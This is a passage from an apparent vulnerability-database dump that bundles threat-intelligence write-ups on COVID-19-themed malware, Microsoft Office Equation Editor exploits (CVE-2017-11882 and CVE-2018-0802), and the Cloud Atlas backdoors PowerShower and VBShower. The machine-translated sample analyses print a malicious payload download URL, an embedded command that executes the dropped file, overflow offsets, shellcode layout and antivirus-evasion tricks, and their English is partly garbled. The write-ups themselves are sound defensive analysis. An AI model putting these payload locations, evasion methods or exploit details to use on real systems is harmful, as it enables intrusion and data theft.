\n\n### Fake VPN clients/installers:\n\nA recent [report](<https://www.bleepingcomputer.com/news/security/azorult-malware-infects-victims-via-fake-protonvpn-installer/>) highlights the fact that while many people globally adapt to working from home for the foreseeable future, there is a growing amount of malware disguised as VPN clients and installers. The example discussed in the report delivers the AZORult malware via a fake ProtonVPN client, whereby post-execution the victim machine becomes part of the AZORult botnet. \n\n### Remote meeting software:\n\nTAU are currently monitoring for the appearance of weaponized or fake remote meeting software. TAU are anticipating that there may be an eventual increase over the coming weeks as more people around the world rely on remote working. \n\n### Mobile apps:\n\nAvast have recently [released](<https://www.apklab.io/covid19>) a repository for researchers and defenders due to the growing number of apps that have appeared for Android users. In a recent [report](<https://www.domaintools.com/resources/blog/covidlock-update-coronavirus-ransomware>), a fake Android Coronavirus app was discovered to be delivering ransomware. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/12-fake-mobile-apps.png>) \n\n**Figure 12: Snippet showing potentially malicious and fake apps**\n\n### Fake Coronavirus maps:\n\nIn a report published recently, a fake Coronavirus map was discovered which silently steals passwords, crypto wallets and other sensitive information. 
\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/13-Coronavirus-map.png>)\n\n**Figure 13: Malicious fake Coronavirus map**\n\n## **Ransomware**\n\n[Data encrypted for impact (T1486)](<https://attack.mitre.org/techniques/T1486/>) is observed with a new family of ransomware known as Coronavirus, which was recently [reported](<https://www.bleepingcomputer.com/news/security/new-coronavirus-ransomware-acts-as-cover-for-kpot-infostealer/>). TAU has observed an upward trend in ransomware for some time now, but sadly there has never been a better time for the threat actors to create and distribute ransomware. Ransomware is an ongoing and continual threat which TAU observes very closely. A full write-up will be published soon on this new ransomware campaign. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/14-Coronavirus-ransomware.png>) \n\n**Figure 14: Coronavirus ransomware message**\n\n## **Summary**\n\nThe threats that we are seeing that leverage the COVID-19 pandemic are varied, but primarily familiar. The key here is that the uncertainty and thirst for knowledge about the global pandemic, coupled with the response of working remotely, create new opportunities for exploitation. It may seem obvious, but masquerading and user execution are the two behaviors seen across most of the recently observed threats. While some public lists containing IOC\u2019s do exist, the current global situation could result in a significant increase in cyber attacks. The jump in IOC\u2019s may shortly become unmanageable. Understanding the behaviors, and leveraging the MITRE ATT&CK Framework, will help to detect and mitigate such threats. While Coronavirus themed malware includes a variety of different threats, many of the techniques are seen with regular commodity based malware. As ever, a layered approach should be taken to reduce the risk of such threats. 
Defenders should be extra vigilant in not only staying up to date with future Coronavirus related threats, but also advising their family, friends and colleagues of such threats. \n\n## **Indicators of Compromise (IOC\u2019s)**\n\nPlease refer to the VMware Carbon Black TAU [Github](<https://github.com/carbonblack/tau-tools/tree/master/threat_hunting/IOCs/COVID-19%20Post%20IOCs>) page for a list of IOC\u2019s.\n\nThe post [Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware](<https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {}, "published": "2020-03-19T20:48:06", "type": "carbonblack", "title": "Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0798"], "modified": "2020-03-19T20:48:06", "id": "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756", "href": "https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], 
"cisa_kev": [{"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0802.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Office Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-0798", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. 
This vulnerability is known to be chained with CVE-2018-0798.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Office Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-0802", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2018-12-02T18:49:48", "description": "We recently captured a Word document with a .doc extension which, on inspection, is actually a Rich Text Format document. Opening it in a test environment produced network connections and program execution, so the sample was determined to be a malicious document. Preliminary analysis found that it is a new sample exploiting CVE-2017-11882. CVE-2017-11882 and CVE-2018-0802 are both vulnerabilities in the processing logic of the Office Equation Editor and have recently become a conventional means of malicious document attacks against Office. 
Analyses of the root cause and exploitation of this vulnerability are already available online, such as the 360 Tianyan Lab technical analysis of the latest [AV evasion](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>) technique for CVE-2017-11882 that abuses the Office Equation Editor's special processing logic, and the Tencent PC Manager analysis of a sample that combined the N-day vulnerability CVE-2017-11882 with the 0-day vulnerability CVE-2018-0802 to spread a remote control Trojan. This sample differs slightly from those analysed before and should be a variant of the CVE-2017-11882 exploit. \n1. Basic behaviour \nTest environment: Windows 7 x64 SP1, Chinese edition; Office 2010, Chinese edition. \nAfter the vulnerable sample is opened, the displayed document content is garbled, as shown below. \n![](https://image.3001.net/images/20181124/1543024815_5bf8b0aff1ceb.png!small) \nIn addition, an executable named emre.exe is created and run in the %temp% directory. Packet capture shows that emre.exe is produced by downloading http://ghthf.cf/cert/ochicha.exe, as shown below. \n![](https://image.3001.net/images/20181124/1543025083_5bf8b1bb3a590.png!small) \n2. Vulnerability debugging \n2.1 Sample format \nOpened in WinHex, the file looks as shown in the following two figures. The displayed content follows directly after the document header. \n![](https://image.3001.net/images/20181124/1543025978_5bf8b53ac1bc7.png!small) \nThis is followed by the object, as shown below. \n![](https://image.3001.net/images/20181124/1543025728_5bf8b44012bda.png!small) \n2.2 Preliminary RTF analysis \nThe result of analysis with rtfobj is shown below. The CLSID is 0002ce02-0000-0000-c000-000000000046, i.e. the Microsoft Equation Editor object. \n![](https://image.3001.net/images/20181124/1543026347_5bf8b6ab810d7.png!small) \n![](https://image.3001.net/images/20181124/1543026881_5bf8b8c10fb6b.png!small) \nFrom the figure we can see that the object name is \u201ceQuatiON native\u201d; changing the case of the normal object name \u201cEquation Native\u201d may also be one of the [AV evasion](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>) tricks. \n2.3 Vulnerability debugging \nAccording to the various vulnerability analysis reports, we go straight to debugging the vulnerable function at 0041160F. \n![](https://image.3001.net/images/20181124/1543027328_5bf8ba80a5a02.png!small) \nAfter the 11th rep operation, as shown in the figure below, the stack is overwritten with 0x0043F775. \n![](https://image.3001.net/images/20181124/1543027588_5bf8bb8428e33.png!small) \n![](https://image.3001.net/images/20181124/1543027800_5bf8bc58c5a27.png!small) \nThe value at 0x0043F775 in the EQNEDT32.EXE process is C3, which happens to be the retn instruction. \n![](https://image.3001.net/images/20181124/1543028035_5bf8bd439c8e9.png!small) \nAfter it executes, control jumps to the shellcode location, as shown below: \n![](https://image.3001.net/images/20181124/1543028175_5bf8bdcf72dd2.png!small) \n2.4 Shellcode debugging and analysis \nThe shellcode is located in the eQuatiON native object. \nIt is divided into two parts. The first part runs from offset 0x0826 (the bytes B9 C439E66A, which appear at 0018F354 in the disassembly shown in the figure above) to offset 0x0851, followed by the four bytes 0x0043F7F5 (the address of the RETN instruction in the EQNEDT32.EXE process). The second part runs from offset 0x089E to the end. \n![](https://image.3001.net/images/20181124/1543028371_5bf8be938ff06.png!small) \nThe assembly instructions by which the first part of the shellcode jumps to the second part are shown below: \n![](https://image.3001.net/images/20181124/1543029212_5bf8c1dc1ce30.png! 
small) \nAfter analysis, found that the segment of shellcode, a series of jmp jump instruction operation, due to shellcode obfuscation and protection. For example, the following figure shows: \n! [](https://image.3001.net/images/20181124/1543029376_5bf8c280e0d65.png! small)\n\n**[1] [[2]](<92253_2.htm>) [next](<92253_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-12-02T00:00:00", "type": "myhack58", "title": "A CVE-2017-11882 vulnerability is a new variation of a sample of the debugging and analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2018-12-02T00:00:00", "id": "MYHACK58:62201892253", "href": "http://www.myhack58.com/Article/html/3/62/2018/92253.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-25T17:29:45", "description": "! [](/Article/UploadPic/2018-12/20181225205545726. 
png) \nRecently intercepted an extension doc word document to attack the samples, which format is actually RTF format. By analyzing the document composition the use of a cve-2017-11882 and cve-2018-0802 vulnerability, and use the embedded excel object is used to trigger the vulnerability. The release of the PE file is used to collect the target user's sensitive information. \n\nFirst, the basic situation \nIn the experimental environment win764, the Office 2010 open the document, process monitoring, found that the winword process is executed after the \u9996\u5148\u6267\u884cexcel.exe that \u7136\u540e\u8fd0\u884cEQNEDT32.exe that \u63a5\u7740\u8fd0\u884ccmd.exe finally run A process. X, in which EQNEDT32. exe running twice. \u770b\u5230EQNEDT32.exe bottle feel should be cve-2017-11882 or cve-2018-0802 samples. \nThe document is opened, display as a empty document, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545737. png) \nOn the figure, inadvertently probably thought it was empty, in fact, a closer look, found the top left a small black point icon. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545312. png) \nDouble-click the Find pop-up window, as shown below. Display the\u201cwindows cannot open this file: A. X\u201d. Obviously, the\u201csmall black dot\u201dshould be an external object. \n! [](/Article/UploadPic/2018-12/20181225205545780. png) \nRight-click the object, select\u201cpackager shell object\u201dobject, you can view the object's\u201cproperties\u201d. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545220. png) \nIts object properties as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545229. png) \nSee here, we it can be concluded that: the sample should be is to use the RTF is embedded in a PE object in the open document when the default release to the%temp%directory, then use cve-2017-11882 or cve-2018-0802 execution of the process. 
\n\nSecond, the RTF analysis \n1, the document structure analysis \n! [](/Article/UploadPic/2018-12/20181225205545186. png) \nUse rtfobj attack on the document analysis, finding its embedded two objects, respectively, is a package object and an Excel. Sheet. 8 object. As shown in Fig. Package object the original file is\u201cC:\\\\\\Users\\\\\\n3o\\\\\\AppData\\\\\\Local\\\\\\Microsoft\\\\\\Windows\\\\\\INetCache\\\\\\Content.Word\\\\\\A.X\u201dit. From this it can be seen, the author of the document[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)user name: n3o on. \nWherein A. X is the release of the malicious PE file. \nThe other one is an embedded excel table object, we put the extract of the excel table the suffix renamed. xls after excel is opened. Find it contains two objects AAAA and bbbb are\u201cEquation. 3\u201dthe object, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545928. png) \nTo extract the excel table object, which is the document structure as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545742. png) \nThe table includes two CLSID for\u201c0002ce02-0000-0000-c000-000000000046\u201dMicrosoft Equation 3.0 object MBD0002E630 and MBD0002E631, you can see the modification time for the 2018/5/21 17:of 52. \n! [](/Article/UploadPic/2018-12/20181225205545793. png) \nIn addition, two\u201cMicrosoft Equation 3.0\u201dobject. Ole10Native size of 59 bytes and 160 bytes, which contains a\u201ccmd.exe /c %tmp%\\A. X\u201dused to perform A. The X process. Should be used in combination for cve-2017-11882 and cve-2018-0802 two vulnerabilities. \nThus, we can fundamental analysis clear the sample, the overall flow diagram as the following figure shown. \n! [](/Article/UploadPic/2018-12/20181225205545654. png) \n2, the static document \nUse winhex to open, you can find the first package object in File 0x2A8A. 
Wherein 0x00137158 refers to the size of the object, that is, the decimal 1274200, it is the release of A. X size. Followed by IS PE file in winhex we can see that the author put the PE head 0x4D5A has been modified, inserted in the middle 0x090d is divided, so that it becomes[0x090d]4[0x090d]d[0x090d]5[0x090d]a[0x090d], in fact, is 0x4d5a, such an operation should be in order to avoid certain anti-virus of Avira, not directly to 0x4d5a9000 the look of the rendering, a look that is clearly of the PE file. Specific as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545840. png) \nAnother object in 0x299061 position, is an Exce. Sheet. 8 object. Its size is 0x00005C00, that is, the decimal 23552, and rtfobj extracted exel size consistent. The author of the compound document header has changed, with 0x0909 is divided, so that d0cf11 at the beginning of the composite document into the d[0x0909]0[0x0909]\u3002 Should also be a certain sense of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)\n\n**[1] [[2]](<92510_2.htm>) [[3]](<92510_3.htm>) [next](<92510_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-12-25T00:00:00", "type": "myhack58", "title": "A use cve-2017-11882 and cve-2018-0802 combination of vulnerability a malicious document analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2018-12-25T00:00:00", "id": "MYHACK58:62201892510", "href": "http://www.myhack58.com/Article/html/3/62/2018/92510.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-09T12:10:51", "description": "Prior to inadvertently give a very interesting rtf document, the sandbox where the behavior of a pile, the document itself and confuse the very clear odd, so spend a little time to analyze this sample. Substantially clear the sample of the attack techniques and attack the chain, the open part of the analysis process, the sample and data for your reference. \nSpecial thanks to Flygend provide the intelligence and the silver Yan ice during the analysis about the shellcode understand the confusion of support \n0x00 sample basic information \nThe sample is an rtf document, first upload the VT time is 10 months 24 days, is located by the China the user through the web upload. \n! [](/Article/UploadPic/2018-11/201811914344718. png) \nUse the editor to view the sample can be learned from sample of embedded OLE objects through the confusion. \n! [](/Article/UploadPic/2018-11/201811914345322. png) \nUnable to use the tool to extract the OLE objects of the premise, the use of silver Yan ice to inform the method, successfully acquired the Equation. 3 objects, and in stream flow found in the part of the suspected shellcode data. \n! [](/Article/UploadPic/2018-11/201811914345629. 
png) \nAnalyzing and sorting samples of landing process chain is as follows: \nWinword.exe \nEQNEDT32.EXE \nMSCLTPAA.exe \nDXDriver.dll \n_XDSFA_XVGVGGH. dmp \n\n0x01 doc document analysis process \nFirst, you can see the document of the ole object is a serious confusion. Then you need to let the memory to load the ole object, and dump it out, see the following commissioning elements: \n! [](/Article/UploadPic/2018-11/201811914345482. png) \nFor Eqnedt32. exe to register the debugger, run the rtf documents, find the doc file will trigger the cve-2017-11882 vulnerability, the specific copy of the content shown in the following figure the red box the circle the part will trigger the vulnerability: the \n! [](/Article/UploadPic/2018-11/201811914345596. png) \nStack frame structure the following box and red circle out of the section, respectively, as a function of the return address and pressed into the first parameter of: \n! [](/Article/UploadPic/2018-11/201811914345268. png) \nThe following screenshots you can see that strlen returns the result to 0x30, and you want to copy to the stack in the location of ebp-0x28, so there will be 8 bytes of the overflow, replace the function return address is 0x410db7 it. And 0x410db7 location of the instruction is a ret, so the second bounce of the stack, the EIP is assigned the value of this function is the first parameter, which is 0x18f354. \n! [](/Article/UploadPic/2018-11/201811914345951. png) \nThe program runs to the next figure, the implementation of the first paragraph of the shellcode is. This section of shellcode behavior: jump to the current esp+0x2c8\uff080x18f4a4 points to the memory area 0x5a88f0 it. \n! [](/Article/UploadPic/2018-11/201811914345847. png) \nThe decryption is finished after the jump to the real shellcode \n! [](/Article/UploadPic/2018-11/201811914345718. 
png) \nThrough the figure above that, the shellcode in the heap, so only not turned on dep in the environment in order to run the second paragraph of the shellcode is. \nThe second paragraph of the shellcode first XOR decryption, the decryption is completed, a jump to the function entry. This shellcode hard coding a lot of strings and the API address, and encryption. The first half of through a lot of string concatenation and padding method, to generate will be the release of files to a directory and you want to load the dll name. \n! [](/Article/UploadPic/2018-11/201811914345997. png) \n! [](/Article/UploadPic/2018-11/201811914345664. png) \nAccess to the registry key, set the start on boot: \n! [](/Article/UploadPic/2018-11/201811914345596. png) \nThe enumeration process the anti-debugging: \n! [](/Article/UploadPic/2018-11/201811914345784. png) \nRelease file: \n! [](/Article/UploadPic/2018-11/201811914345158. png) \nThe MSCLTLAA. exe for string2Byte after decryption, the resulting PE file. \n! [](/Article/UploadPic/2018-11/201811914346672. png) \nCreate MSCLTPAA. exe and then write the decrypted data. \n! [](/Article/UploadPic/2018-11/201811914346300. png) \n! [](/Article/UploadPic/2018-11/201811914346711. 
png)\n\n**[1] [[2]](<91962_2.htm>) [[3]](<91962_3.htm>) [next](<91962_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-11-09T00:00:00", "type": "myhack58", "title": "The use of a posture clear odd 11882 format overflow document analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2018-11-09T00:00:00", "id": "MYHACK58:62201891962", "href": "http://www.myhack58.com/Article/html/3/62/2018/91962.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2019-08-12T19:33:22", "description": "\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. 
We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactic Tools and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victims - hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. 
During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it by using Wscript.exe \nDefault | If the first byte doesn't match 0x80 or 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \nAfter executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. 
\n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the opensource tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And his new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain relying no more on PowerShower directly after infection, but executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower** which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for VBShower ;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain allows the attacker to try to prevent IoC-based defence, as each code is unique by victim so it can't be searched via file hash on the host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy of the validator version of PowerShower. 
Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries to get via HTTP a VBS script to execute from the remote server every hour.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor which communicates to a cloud storage service via Webdav.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating. 
